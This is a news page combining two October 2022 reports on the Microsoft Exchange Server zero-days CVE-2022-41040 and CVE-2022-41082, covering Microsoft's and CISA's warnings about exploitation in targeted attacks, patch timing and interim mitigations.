Security solutions firm Huntress is posting updated information about the vulnerabilities in this post. "Currently, there are no known proof-of-concept scripts or exploitation tooling available in the wild," wrote John Hammond, senior security researcher at Huntress.

Microsoft hasn't issued patches yet. Organizations running Exchange Server will likely need to be using the latest cumulative updates, though, when those patches arrive.

"It's very likely when MS produces patches for this, they will be only for the latest supported Exchange CUs -- so you probably want to get to those first, otherwise the SU (Security Updates) won't show as applicable," Beaumont wrote in the Twitter thread.

About the Author

Kurt Mackie is senior news producer for 1105 Media's Converge360 group.

Tue, 04 Oct 2022 20:42:00 -0500
Microsoft: New Exchange Server zero-days already used in attacks, expect more to come

Microsoft has warned that attackers are already taking advantage of recently disclosed zero-day exploits to hack into victims' networks and steal data – and more attacks are likely to be on the way.

The two new zero-day vulnerabilities in Microsoft Exchange Server -- CVE-2022-41040 and CVE-2022-41082 -- were detailed last week, with warnings that they could allow hackers to remotely gain access to internal services and execute remote code on networks. 

Now Microsoft has provided more information on how the vulnerabilities have already been used – in attacks that first started in August. 

In what's described as a "small number of targeted attacks", the CVE-2022-41040 and CVE-2022-41082 vulnerabilities were chained together to provide attackers with "hands-on-keyboard access", which was used to perform Active Directory reconnaissance and to steal data. The victims haven't been publicly disclosed.


The attacks require the attacker to be an authenticated user, but it's possible to gain access to these credentials with phishing attacks, brute force attacks or buying stolen usernames and passwords from underground forums.

While there are currently no specific indications as to who's behind these attacks, Microsoft's Security Threat Intelligence Team (MSTIC) "assesses with medium confidence" that they're the work of a single activity group connected to a state-sponsored cyber operation.

Microsoft says it's working on what it describes as an "accelerated timeline" to release a security fix for the vulnerability – although it has yet to emerge. 

But since the vulnerability has been publicly disclosed, it's likely that hacking operations are already moving to take advantage of it before a patch becomes available, with Microsoft warning that "overall exploitation of these vulnerabilities will increase". 

Previous Microsoft Exchange vulnerabilities were featured in a variety of cyberattacks, including state-sponsored cyber-espionage campaigns, ransomware operations and cryptojacking attacks as attackers rushed to exploit the vulnerabilities before organisations had a chance to apply the patch. 

The United States Cybersecurity & Infrastructure Security Agency (CISA) has also issued a warning that attackers could exploit the latest Microsoft Exchange Server vulnerabilities. 

While a patch is yet to become available, Microsoft has provided guidance on mitigating the threat, including the recommendation that Exchange Server customers disable remote PowerShell access for non-admin users. 

"CISA encourages users and administrators to review the information from Microsoft and apply the necessary mitigations until patches are made available," said a CISA alert.


Mon, 03 Oct 2022 02:04:00 -0500